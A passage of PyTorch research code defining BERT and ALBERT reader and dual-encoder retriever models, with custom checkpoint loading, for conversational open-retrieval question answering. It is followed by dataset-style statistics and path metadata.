scores (before SoftMax). **end_scores**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length,)`` Span-end scores (before SoftMax). **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``) list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings) of shape ``(batch_size, sequence_length, hidden_size)``: Hidden-states of the model at the output of each layer plus the initial embedding outputs. **attentions**: (`optional`, returned when ``config.output_attentions=True``) list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``: Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. 
""" def __init__(self, config): super(AlbertForOrconvqaGlobal, self).__init__(config) self.num_qa_labels = config.num_qa_labels self.albert = AlbertModel(config) self.qa_outputs = nn.Linear(config.hidden_size, config.num_qa_labels) self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) self.qa_loss_factor = config.qa_loss_factor self.retrieval_loss_factor = config.retrieval_loss_factor self.init_weights() def forward(self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, retrieval_label=None): batch_size, num_blocks, seq_len = input_ids.size() input_ids = input_ids.view(-1, seq_len) attention_mask = attention_mask.view(-1, seq_len) token_type_ids = token_type_ids.view(-1, seq_len) outputs = self.albert(input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds) sequence_output = outputs[0] pooled_output = outputs[1] qa_logits = self.qa_outputs(sequence_output) start_logits, end_logits = qa_logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1) # (batch_size * num_blocks, seq_len) # print('start_logits', start_logits.size()) end_logits = end_logits.squeeze(-1) pooled_output = self.dropout(pooled_output) retrieval_logits = self.classifier(pooled_output) # (batch_size * num_blocks, 1) # print('retrieval_logits', retrieval_logits.size()) outputs = (start_logits, end_logits, retrieval_logits) + outputs[2:] if start_positions is not None and end_positions is not None and retrieval_label is not None: start_logits = start_logits.view(batch_size, -1) end_logits = end_logits.view(batch_size, -1) retrival_logits = retrieval_logits.squeeze(-1) retrieval_logits = retrieval_logits.view(batch_size, -1) start_positions = start_positions.squeeze(-1).max(dim=1).values end_positions = end_positions.squeeze(-1).max(dim=1).values retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions.clamp_(0, ignored_index) end_positions.clamp_(0, ignored_index) qa_loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = qa_loss_fct(start_logits, start_positions) end_loss = qa_loss_fct(end_logits, end_positions) qa_loss = (start_loss + end_loss) / 2 retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) total_loss = self.qa_loss_factor * qa_loss + self.retrieval_loss_factor * retrieval_loss outputs = (total_loss, qa_loss, retrieval_loss,) + outputs return outputs # (loss), start_logits, end_logits, (hidden_states), (attentions) class BertForRetriever(BertPreTrainedModel): r""" """ def __init__(self, config): super(BertForRetriever, self).__init__(config) self.query_encoder = BertModel(config) self.query_proj = nn.Linear(config.hidden_size, config.proj_size) self.passage_encoder = BertModel(config) self.passage_proj = nn.Linear(config.hidden_size, config.proj_size) self.proj_size = config.proj_size self.dropout = nn.Dropout(config.hidden_dropout_prob) self.init_weights() def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, 
passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None): outputs = () if query_input_ids is not None: query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size # print(query_rep[:, 0]) outputs = (query_rep, ) + outputs if passage_input_ids is not None: if len(passage_input_ids.size()) == 3: # this means we are pretraining batch_size, num_blocks, seq_len = passage_input_ids.size() passage_input_ids = passage_input_ids.view(-1, seq_len) # batch_size * num_blocks, seq_len passage_attention_mask = passage_attention_mask.view(-1, seq_len) passage_token_type_ids = passage_token_type_ids.view(-1, seq_len) passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size * num_blocks, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep, ) + outputs if query_input_ids is not None and passage_input_ids is not None and retrieval_label is not None: passage_rep = passage_rep.view(batch_size, num_blocks, -1) # batch_size, num_blocks, proj_size query_rep = query_rep.unsqueeze(-1) # query_rep (batch_size, proj_size, 1) query_rep = query_rep.expand(batch_size, self.proj_size, num_blocks) # batch_size, proj_size, num_blocks) query_rep = query_rep.transpose(1, 2) # query_rep (batch_size, num_blocks, proj_size) retrieval_logits = query_rep * passage_rep # batch_size, num_blocks, proj_size retrieval_logits = torch.sum(retrieval_logits, dim=-1) # batch_size, num_blocks retrieval_probs = F.softmax(retrieval_logits, dim=1) # print('retrieval_label before', retrieval_label.size(), retrieval_label) retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) retrieval_logits = retrieval_logits.view(-1) outputs = (retrieval_loss, retrieval_logits, retrieval_probs) + outputs return outputs @classmethod def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs): r""" """ if pretrained_model_name_or_path is not None and ( "albert" in pretrained_model_name_or_path and "v2" in pretrained_model_name_or_path): logger.warning("There is currently an upstream reproducibility issue with ALBERT v2 models. 
Please see " + "https://github.com/google-research/google-research/issues/119 for more information.") config = kwargs.pop('config', None) state_dict = kwargs.pop('state_dict', None) cache_dir = kwargs.pop('cache_dir', None) from_tf = kwargs.pop('from_tf', False) force_download = kwargs.pop('force_download', False) resume_download = kwargs.pop('resume_download', False) proxies = kwargs.pop('proxies', None) output_loading_info = kwargs.pop('output_loading_info', False) # Load config if config is None: config, model_kwargs = cls.config_class.from_pretrained( pretrained_model_name_or_path, *model_args, cache_dir=cache_dir, return_unused_kwargs=True, force_download=force_download, proxies=proxies, **kwargs ) else: model_kwargs = kwargs # Load model if pretrained_model_name_or_path is not None: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: archive_file = cls.pretrained_model_archive_map[pretrained_model_name_or_path] elif os.path.isdir(pretrained_model_name_or_path): if from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index")): # Load from a TF 1.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index") elif from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME)): # Load from a TF 2.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME) elif os.path.isfile(os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME)): # Load from a PyTorch checkpoint archive_file = os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME) else: raise EnvironmentError("Error no file named {} found in directory {} or `from_tf` set to False".format( [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME + ".index"], pretrained_model_name_or_path)) elif os.path.isfile(pretrained_model_name_or_path + ".index"): assert from_tf, "We found a TensorFlow checkpoint at {}, please set from_tf to True to load from this checkpoint".format( pretrained_model_name_or_path + ".index") archive_file = pretrained_model_name_or_path + ".index" # redirect to the cache, if necessary try: resolved_archive_file = cached_path(archive_file, cache_dir=cache_dir, force_download=force_download, proxies=proxies) except EnvironmentError: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: msg = "Couldn't reach server at '{}' to download pretrained weights.".format( archive_file) else: msg = "Model name '{}' was not found in model name list ({}). " \ "We assumed '{}' was a path or url to model weight files named one of {} but " \ "couldn't find any such file at this path or url.".format( pretrained_model_name_or_path, ', '.join(cls.pretrained_model_archive_map.keys()), archive_file, [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME]) raise EnvironmentError(msg) if resolved_archive_file == archive_file: logger.info("loading weights file {}".format(archive_file)) else: logger.info("loading weights file {} from cache at {}".format( archive_file, resolved_archive_file)) else: resolved_archive_file = None # Instantiate model. 
model = cls(config, *model_args, **model_kwargs) if state_dict is None and not from_tf: state_dict = torch.load(resolved_archive_file, map_location='cpu') missing_keys = [] unexpected_keys = [] error_msgs = [] if from_tf: if resolved_archive_file.endswith('.index'): # Load from a TensorFlow 1.X checkpoint - provided by original authors model = cls.load_tf_weights(model, config, resolved_archive_file[:-6]) # Remove the '.index' else: # Load from our TensorFlow 2.0 checkpoints try: from transformers import load_tf2_checkpoint_in_pytorch_model model = load_tf2_checkpoint_in_pytorch_model(model, resolved_archive_file, allow_missing_keys=True) except ImportError as e: logger.error("Loading a TensorFlow model in PyTorch, requires both PyTorch and TensorFlow to be installed. Please see " "https://pytorch.org/ and https://www.tensorflow.org/install/ for installation instructions.") raise e else: # Convert old format to new format if needed from a PyTorch state_dict old_keys = [] new_keys = [] for key in state_dict.keys(): new_key = None if 'gamma' in key: new_key = key.replace('gamma', 'weight') if 'beta' in key: new_key = key.replace('beta', 'bias') if key == 'lm_head.decoder.weight': new_key = 'lm_head.weight' if new_key: old_keys.append(key) new_keys.append(new_key) for old_key, new_key in zip(old_keys, new_keys): state_dict[new_key] = state_dict.pop(old_key) # copy state_dict so _load_from_state_dict can modify it metadata = getattr(state_dict, '_metadata', None) # print('orig state dict', state_dict.keys(), len(state_dict)) customized_state_dict = collections.OrderedDict() for k, v in state_dict.items(): k_split = k.split('.') if k_split[0] == 'bert': k_split[0] = 'query_encoder' customized_state_dict['.'.join(k_split)] = v k_split[0] = 'passage_encoder' customized_state_dict['.'.join(k_split)] = v if len(customized_state_dict) == 0: # loading from our trained model state_dict = state_dict.copy() # print('using orig state dict', state_dict.keys()) else: # loading from original bert model state_dict = customized_state_dict.copy() # print('using custome state dict', state_dict.keys()) # print('modified state dict', state_dict.keys(), len(state_dict)) if metadata is not None: state_dict._metadata = metadata # PyTorch's `_load_from_state_dict` does not copy parameters in a module's descendants # so we need to apply the function recursively. def load(module, prefix=''): local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {}) module._load_from_state_dict( state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs) for name, child in module._modules.items(): if name == 'query_encoder.embeddings.token_type_embeddings.weight': print("name child {}".format(child)) if child is not None: load(child, prefix + name + '.') # Make sure we are able to load base models as well as derived models (with heads) start_prefix = '' model_to_load = model # if not hasattr(model, cls.base_model_prefix) and any(s.startswith(cls.base_model_prefix) for s in state_dict.keys()): # start_prefix = cls.base_model_prefix + '.' 
# if hasattr(model, cls.base_model_prefix) and not any(s.startswith(cls.base_model_prefix) for s in state_dict.keys()): # model_to_load = getattr(model, cls.base_model_prefix) # load(model_to_load, prefix=start_prefix) load(model_to_load, prefix='') if len(missing_keys) > 0: logger.info("Weights of {} not initialized from pretrained model: {}".format( model.__class__.__name__, missing_keys)) if len(unexpected_keys) > 0: logger.info("Weights from pretrained model not used in {}: {}".format( model.__class__.__name__, unexpected_keys)) if len(error_msgs) > 0: raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format( model.__class__.__name__, "\n\t".join(error_msgs))) model.tie_weights() # make sure word embedding weights are still tied if needed # Set model in evaluation mode to desactivate DropOut modules by default model.eval() if output_loading_info: loading_info = {"missing_keys": missing_keys, "unexpected_keys": unexpected_keys, "error_msgs": error_msgs} return model, loading_info return model class BertForRetrieverOnlyPositivePassage(BertForRetriever): r""" """ def __init__(self, config): super(BertForRetriever, self).__init__(config) self.query_encoder = BertModel(config) self.query_proj = nn.Linear(config.hidden_size, config.proj_size) self.passage_encoder = BertModel(config) self.passage_proj = nn.Linear(config.hidden_size, config.proj_size) self.proj_size = config.proj_size self.dropout = nn.Dropout(config.hidden_dropout_prob) self.init_weights() def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None): outputs = () if query_input_ids is not None: query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size # print(query_rep[:, 0]) outputs = (query_rep, ) + outputs if passage_input_ids is not None: passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep, ) + outputs if query_input_ids is not None and passage_input_ids is not None: passage_rep_t = passage_rep.transpose(0, 1) # proj_size, batch_size retrieval_logits = torch.matmul(query_rep, passage_rep_t) # batch_size, batch_size retrieval_label = torch.arange(query_rep.size(0), device=query_rep.device, dtype=retrieval_label.dtype) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss, ) + outputs return outputs class AlbertForRetrieverOnlyPositivePassage(AlbertPreTrainedModel): r""" """ def __init__(self, config): super(AlbertForRetrieverOnlyPositivePassage, self).__init__(config) self.query_encoder = AlbertModel(config) self.query_proj = nn.Linear(config.hidden_size, config.proj_size) self.passage_encoder = AlbertModel(config) self.passage_proj = 
nn.Linear(config.hidden_size, config.proj_size) self.proj_size = config.proj_size self.dropout = nn.Dropout(config.hidden_dropout_prob) self.init_weights() def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None, query_rep=None, passage_rep=None, use_fine_grained_attention=False, use_soft_attention_weights=False, device=None): outputs = () if query_input_ids is not None: query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size # print(query_rep[:, 0]) outputs = (query_rep, ) + outputs if passage_input_ids is not None: passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep, ) + outputs if query_input_ids is not None and passage_input_ids is not None: passage_rep_t = passage_rep.transpose(0, 1) # proj_size, batch_size retrieval_logits = torch.matmul(query_rep, passage_rep_t) # batch_size, batch_size retrieval_label = torch.arange(query_rep.size(0), device=query_rep.device, dtype=retrieval_label.dtype) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss, ) + outputs if query_input_ids is not None and passage_rep is not None and retrieval_label is not None and len(passage_rep.size()) == 3: # this is during fine tuning # passage_rep: batch_size, num_blocks, proj_size query_outputs = self.query_encoder(query_input_ids, attention_mask=query_attention_mask, token_type_ids=query_token_type_ids) query_pooled_output = query_outputs[1] query_pooled_output = self.dropout(query_pooled_output) query_rep = self.query_proj(query_pooled_output) # batch_size, proj_size batch_size, num_blocks, proj_size = passage_rep.size() query_rep = query_rep.unsqueeze(-1) # query_rep (batch_size, proj_size, 1) query_rep = query_rep.expand(batch_size, self.proj_size, num_blocks) # batch_size, proj_size, num_blocks) query_rep = query_rep.transpose(1, 2) # query_rep (batch_size, num_blocks, proj_size) retrieval_logits = query_rep * passage_rep # batch_size, num_blocks, proj_size retrieval_logits = torch.sum(retrieval_logits, dim=-1) # batch_size, num_blocks retrieval_probs = F.softmax(retrieval_logits, dim=1) # print('retrieval_label before', retrieval_label.size(), retrieval_label) retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) # print('retrieval_label after', retrieval_label.size(), retrieval_label) retrieval_loss_fct = CrossEntropyLoss() # print('retrieval_logits', retrieval_logits.size(), retrieval_logits) # print('retrieval_label', retrieval_label.size(), retrieval_label) retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss, ) + outputs return outputs @classmethod def from_pretrained(cls, 
pretrained_model_name_or_path, *model_args, **kwargs): r""" """ if pretrained_model_name_or_path is not None and ( "albert" in pretrained_model_name_or_path and "v2" in pretrained_model_name_or_path): logger.warning("There is currently an upstream reproducibility issue with ALBERT v2 models. Please see " + "https://github.com/google-research/google-research/issues/119 for more information.") config = kwargs.pop('config', None) state_dict = kwargs.pop('state_dict', None) cache_dir = kwargs.pop('cache_dir', None) from_tf = kwargs.pop('from_tf', False) force_download = kwargs.pop('force_download', False) resume_download = kwargs.pop('resume_download', False) proxies = kwargs.pop('proxies', None) output_loading_info = kwargs.pop('output_loading_info', False) use_pos_embedding = kwargs.pop('use_positional_segment_embedding', False) max_history_turns = config.type_vocab_size if config is not None else 2 print("use pos embedding {} max history turns {}".format(use_pos_embedding, max_history_turns)) # Load config if config is None: config, model_kwargs = cls.config_class.from_pretrained( pretrained_model_name_or_path, *model_args, cache_dir=cache_dir, return_unused_kwargs=True, force_download=force_download, proxies=proxies, **kwargs ) else: model_kwargs = kwargs # Load model if pretrained_model_name_or_path is not None: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: archive_file = cls.pretrained_model_archive_map[pretrained_model_name_or_path] elif os.path.isdir(pretrained_model_name_or_path): if from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index")): # Load from a TF 1.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF_WEIGHTS_NAME + ".index") elif from_tf and os.path.isfile(os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME)): # Load from a TF 2.0 checkpoint archive_file = os.path.join(pretrained_model_name_or_path, TF2_WEIGHTS_NAME) elif os.path.isfile(os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME)): # Load from a PyTorch checkpoint archive_file = os.path.join(pretrained_model_name_or_path, WEIGHTS_NAME) else: raise EnvironmentError("Error no file named {} found in directory {} or `from_tf` set to False".format( [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME + ".index"], pretrained_model_name_or_path)) elif os.path.isfile(pretrained_model_name_or_path + ".index"): assert from_tf, "We found a TensorFlow checkpoint at {}, please set from_tf to True to load from this checkpoint".format( pretrained_model_name_or_path + ".index") archive_file = pretrained_model_name_or_path + ".index" # redirect to the cache, if necessary try: resolved_archive_file = cached_path(archive_file, cache_dir=cache_dir, force_download=force_download, proxies=proxies) except EnvironmentError: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: msg = "Couldn't reach server at '{}' to download pretrained weights.".format( archive_file) else: msg = "Model name '{}' was not found in model name list ({}). 
" \ "We assumed '{}' was a path or url to model weight files named one of {} but " \ "couldn't find any such file at this path or url.".format( pretrained_model_name_or_path, ', '.join(cls.pretrained_model_archive_map.keys()), archive_file, [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME]) raise EnvironmentError(msg) if resolved_archive_file == archive_file: logger.info("loading weights file {}".format(archive_file)) else: logger.info("loading weights file {} from cache at {}".format( archive_file, resolved_archive_file)) else: resolved_archive_file = None # Instantiate model. model = cls(config, *model_args, **model_kwargs) if state_dict is None and not from_tf: state_dict = torch.load(resolved_archive_file, map_location='cpu') missing_keys = [] unexpected_keys = [] error_msgs = [] if from_tf: if resolved_archive_file.endswith('.index'): # Load from a TensorFlow 1.X checkpoint - provided by original authors model = cls.load_tf_weights(model, config, resolved_archive_file[:-6]) # Remove the '.index' else: # Load from our TensorFlow 2.0 checkpoints try: from transformers import load_tf2_checkpoint_in_pytorch_model model = load_tf2_checkpoint_in_pytorch_model(model, resolved_archive_file, allow_missing_keys=True) except ImportError as e: logger.error("Loading a TensorFlow model in PyTorch, requires both PyTorch and TensorFlow to be installed. Please see " "https://pytorch.org/ and https://www.tensorflow.org/install/ for installation instructions.") raise e else: # Convert old format to new format if needed from a PyTorch state_dict old_keys = [] new_keys = [] for key in state_dict.keys(): new_key = None if 'gamma' in key: new_key = key.replace('gamma', 'weight') if 'beta' in key: new_key = key.replace('beta', 'bias') if key == 'lm_head.decoder.weight': new_key = 'lm_head.weight' if new_key: old_keys.append(key) new_keys.append(new_key) for old_key, new_key in zip(old_keys, new_keys): state_dict[new_key] = state_dict.pop(old_key) # copy state_dict so _load_from_state_dict can modify it metadata = getattr(state_dict, '_metadata', None) # print('orig state dict', state_dict.keys(), len(state_dict)) customized_state_dict = collections.OrderedDict() for k, v in state_dict.items(): k_split = k.split('.') if k_split[0] == 'albert': k_split[0] = 'query_encoder' customized_state_dict['.'.join(k_split)] = v k_split[0] = 'passage_encoder' customized_state_dict['.'.join(k_split)] = v if len(customized_state_dict) == 0: # loading from our trained model state_dict = state_dict.copy() # print('using orig state dict', state_dict.keys()) else: # loading from original bert model state_dict = customized_state_dict.copy() # print('using custome state dict', state_dict.keys()) query_emb_key_name = 'query_encoder.embeddings.token_type_embeddings.weight' passage_emb_key_name = 'passage_encoder.embeddings.token_type_embeddings.weight' if use_pos_embedding and query_emb_key_name in state_dict.keys() and config is not None: print("embedding size {}".format(config.embedding_size)) print("proj size {}".format(config.proj_size)) query_default_emb = state_dict[query_emb_key_name] prev_size = query_default_emb.shape[0] query_default_emb = query_default_emb.resize_((max_history_turns, config.embedding_size)) query_default_emb[prev_size:, :] = torch.zeros(max_history_turns-prev_size, config.embedding_size) print("query default emb shape {}".format(query_default_emb.shape)) state_dict[query_emb_key_name] = query_default_emb if passage_emb_key_name in state_dict.keys(): state_dict[passage_emb_key_name] = query_default_emb # 
print('modified state dict', state_dict.keys(), len(state_dict)) if metadata is not None: state_dict._metadata = metadata # PyTorch's `_load_from_state_dict` does not copy parameters in a module's descendants # so we need to apply the function recursively. def load(module, prefix=''): local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {}) module._load_from_state_dict( state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs) for name, child in module._modules.items(): if child is not None: load(child, prefix + name + '.') # Make sure we are able to load base models as well as derived models (with heads) start_prefix = '' model_to_load = model load(model_to_load, prefix='') if len(missing_keys) > 0: logger.info("Weights of {} not initialized from pretrained model: {}".format( model.__class__.__name__, missing_keys)) if len(unexpected_keys) > 0: logger.info("Weights from pretrained model not used in {}: {}".format( model.__class__.__name__, unexpected_keys)) if len(error_msgs) > 0: raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format( model.__class__.__name__, "\n\t".join(error_msgs))) model.tie_weights() # make sure word embedding weights are still tied if needed # Set model in evaluation mode to desactivate DropOut modules by default model.eval() if output_loading_info: loading_info = {"missing_keys": missing_keys, "unexpected_keys": unexpected_keys, "error_msgs": error_msgs} return model, loading_info return model class AlbertWithHAMForRetrieverOnlyPositivePassage(AlbertForRetrieverOnlyPositivePassage): def __init__(self, config): super(AlbertWithHAMForRetrieverOnlyPositivePassage, self).__init__(config) self.config = config self.ham_linear_layer = nn.Linear(config.proj_size, 1) self.init_weights() def preprocess_sub_batch(self, query_input_ids, query_attention_mask, query_token_type_ids, use_fine_grained_attention=False, use_soft_attention_weights=True, device=None): output = torch.empty(len(query_input_ids), self.config.proj_size).to(device) for i in range(len(query_input_ids)): query_outputs = self.query_encoder(query_input_ids[i], attention_mask=query_attention_mask[i], # (11, 512) token_type_ids=query_token_type_ids[i]) query_pooled_output = query_outputs[1] # cls token (batch size, CLS representation size) query_pooled_output = self.dropout(query_pooled_output) # apply dropout to CLS representation query_rep = self.query_proj(query_pooled_output) # sub_batch_size, proj_size (number of queries, cls representation for each query) if use_soft_attention_weights: cls_weights = self.ham_linear_layer(query_rep) # cls weights: (sub_batch_size, 1) cls_weights = torch.squeeze(cls_weights, dim=-1) alphas = torch.nn.functional.softmax(cls_weights, dim=0) # calculate probabilities for history attention scores. 
else: alphas = torch.mul(torch.ones(query_rep.shape[0]), 1.0/(query_rep.shape[0])).to(device) # token representation if use_fine_grained_attention: alphas = alphas.view(alphas.shape[0], 1, 1) query_sequence_tokens = query_outputs[0] query_sequence_tokens = self.dropout(query_sequence_tokens) query_sequence_reps = self.query_proj(query_sequence_tokens) dense_representation = torch.sum(query_sequence_reps * alphas, dim=0) dense_representation = torch.mean(dense_representation, dim=0, keepdim=True) else: alphas = alphas.view(alphas.shape[0], 1) dense_representation = torch.sum(query_rep * alphas, dim=0, keepdim=True) output[i] = dense_representation return output def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None, query_rep=None, passage_rep=None, use_fine_grained_attention=False, use_soft_attention_weights=True, device=None): outputs = () if query_input_ids is not None and len(query_input_ids) > 0: dense_representation = self.preprocess_sub_batch(query_input_ids, query_attention_mask, query_token_type_ids, use_fine_grained_attention, use_soft_attention_weights, device) outputs = (dense_representation, ) + outputs if passage_input_ids is not None: passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] # passage CLS representation passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep,) + outputs if query_input_ids is not None and len(query_input_ids) > 0 and passage_input_ids is not None: passage_rep_t = passage_rep.transpose(0, 1) # proj_size, batch_size (128, batch_size) retrieval_logits = torch.matmul(query_rep, passage_rep_t) # batch_size, batch_size retrieval_label = torch.arange(query_rep.size(0), device=query_rep.device, dtype=retrieval_label.dtype) # batch size retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss,) + outputs if query_input_ids is not None and len(query_input_ids) > 0 and passage_rep is not None and retrieval_label is not None and len( passage_rep.size()) == 3: dense_representation = self.preprocess_sub_batch(query_input_ids, query_attention_mask, query_token_type_ids, use_fine_grained_attention, use_soft_attention_weights, device) batch_size, num_blocks, proj_size = passage_rep.size() query_rep = dense_representation.unsqueeze(-1) # query_rep (batch_size, proj_size, 1) query_rep = query_rep.expand(batch_size, self.proj_size, num_blocks) # batch_size, proj_size, num_blocks) query_rep = query_rep.transpose(1, 2) # query_rep (batch_size, num_blocks, proj_size) retrieval_logits = query_rep * passage_rep # batch_size, num_blocks, proj_size retrieval_logits = torch.sum(retrieval_logits, dim=-1) # batch_size, num_blocks retrieval_probs = F.softmax(retrieval_logits, dim=1) retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss,) + outputs return outputs class Pipeline(nn.Module): def __init__(self): super(Pipeline, self).__init__() self.reader = None self.retriever = None
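BertForRetrieverOnlyPositivePassage and its ALBERT counterpart above train with in-batch negatives: every query is scored against every passage in the batch, the diagonal entries are the positives, and the label tensor is therefore just torch.arange over the batch. A minimal self-contained sketch of that objective, with random tensors standing in for the encoder projections (the shapes are illustrative assumptions):

import torch
from torch.nn import CrossEntropyLoss

batch_size, proj_size = 3, 128
query_rep = torch.randn(batch_size, proj_size)    # stands in for query_proj output
passage_rep = torch.randn(batch_size, proj_size)  # stands in for passage_proj output

# (batch_size, batch_size) scores; entry [i][j] scores query i against passage j.
retrieval_logits = torch.matmul(query_rep, passage_rep.transpose(0, 1))
# Passage i is the positive for query i, so the targets are 0..batch_size-1.
retrieval_label = torch.arange(batch_size)
retrieval_loss = CrossEntropyLoss()(retrieval_logits, retrieval_label)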
55.252399
144
0.626631
6,801
57,573
4.991619
0.060579
0.021209
0.015553
0.025981
0.913102
0.904206
0.892866
0.882909
0.875191
0.873071
0
0.005442
0.291439
57,573
1,041
145
55.305476
0.826739
0.220763
0
0.835694
0
0.005666
0.064205
0.005343
0
0
0
0
0.002833
1
0.028329
false
0.110482
0.024079
0
0.080737
0.007082
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
f1ddf1128b637063495531cd751ffe0b85ab5263
91
py
Python
src/yafowil/yaml/__init__.py
conestack/yafowil.yaml
9a5d3b808f85a1c204c31219f957b7a77cd23b8e
[ "BSD-2-Clause" ]
2
2019-07-09T12:47:21.000Z
2019-11-17T10:24:33.000Z
src/yafowil/yaml/__init__.py
conestack/yafowil.yaml
9a5d3b808f85a1c204c31219f957b7a77cd23b8e
[ "BSD-2-Clause" ]
3
2018-04-16T09:53:15.000Z
2019-06-24T14:45:06.000Z
src/yafowil/yaml/__init__.py
conestack/yafowil.yaml
9a5d3b808f85a1c204c31219f957b7a77cd23b8e
